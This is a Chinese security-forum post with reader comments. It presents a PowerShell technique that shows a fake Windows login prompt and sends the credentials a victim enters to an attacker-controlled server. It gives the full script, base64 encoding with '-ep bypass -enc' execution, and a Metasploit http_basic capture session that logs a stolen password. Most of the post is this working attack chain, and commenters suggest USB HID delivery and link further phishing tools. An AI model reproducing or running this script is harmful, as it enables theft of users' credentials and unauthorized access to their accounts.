Powershell Popups + Capture

五道口杀气 | 2015-01-13 18:17

英文原文:Powershell Popups + Capture

这个方法优势就是可以不产生任何文件,可以获取任何权限用户的认证信息

不需要管理员权限,不需要绕过UAC。

原理就是利用powershell脚本制造一个假的登陆界面,管理员登陆之后会把密码发送到我们的服务器上。

这里接收密码是使用的metasploit。

powershell脚本:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

172.16.102.163为我们接受的地址。

cat power.txt | iconv --to-code UTF-16LE | base64

把代码生成base64.

然后执行

powershell -ep bypass -enc <base64编码的代码>

利用powershell脚本制造一个假的登陆界面

metasploit接收密码:

root@wpad:~/metasploit-framework# ./msfconsole -Lq 
msf > use auxiliary/server/capture/http_basic 
msf auxiliary(http_basic) > show options 

Module options (auxiliary/server/capture/http_basic): 

Name         Current Setting  Required  Description 
----         ---------------  --------  ----------- 
REALM        Secure Site      yes       The authentication realm you'd like to present.
RedirectURL                   no        The page to redirect users to after they enter basic auth creds
SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT      80               yes       The local port to listen on. 
SSL          false            no        Negotiate SSL for incoming connections
SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true 
SSL => true 
msf auxiliary(http_basic) > set SRVPORT 443 
SRVPORT => 443 
msf auxiliary(http_basic) > set URIPATH / 
URIPATH => / 
msf auxiliary(http_basic) > run 
[*] Auxiliary module execution completed 
msf auxiliary(http_basic) > 
[*] Listening on 0.0.0.0:443... 
[*] Using URL: https://0.0.0.0:443/ 
[*]  Local IP: https://172.16.102.163:443/ 
[*] Server started. 
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140 
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

[原文地址]

各种吐槽:

1#

YY-2012 (#)<alert("living")>(#) | 2015-01-13 18:26

so 吊

2#

Kavia (求工作求收留) | 2015-01-13 18:40

mark

3#

Chu (学习ing。) | 2015-01-13 18:42

在hak5 上看到了,感觉挺棒的

4#

xsser (十根阳具有长短!!) | 2015-01-13 18:42

这玩意太牛了

5#

insight-labs (Root Yourself in Success) | 2015-01-13 19:05

猥琐淫荡……

6#

RainShine (I'm your angel of music.) | 2015-01-13 19:52

so diao...

7#感谢(1)

Jeremy | 2015-01-13 19:57

《论ctrl+alt+del的重要性》

8#

ACGT | 2015-01-13 20:49

懒得自己写的话,对付xp可以用这个

http://exploit.co.il/hacking/windows-domain-credentials-phishing-tool/

9#

Anymous (听说集齐7枚wb能召唤神龙,兑换树莓派,点击右边感谢收集wb,召唤神龙!) | 2015-01-13 21:01

powershell的,可以放到HID键盘攻击

http://zone.wooyun.org/content/17931

找人插一下它

10#

Anymous (听说集齐7枚wb能召唤神龙,兑换树莓派,点击右边感谢收集wb,召唤神龙!) | 2015-01-13 21:02

好像有点鸡肋

11#

%230CC (Who's Your Daddy ---lordi) | 2015-01-14 11:28

在详细讲一下 怎么把MSF接进去吧。。。

12#

_Evil (科普是一种公益行为) | 2015-01-14 14:16

好玩的东西

13#

冷冷的夜 (预备唱:希望你过的没我好,死得比我早,吃不好也睡不) | 2015-01-14 16:02

room362 必须是干货啊,就是更新频率太慢了

14#

Ano_Tom | 2015-01-14 16:17

666

15#

疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-01-14 16:33

powershell太强了,这思路太牛了啊。。。cmd哭晕在厕所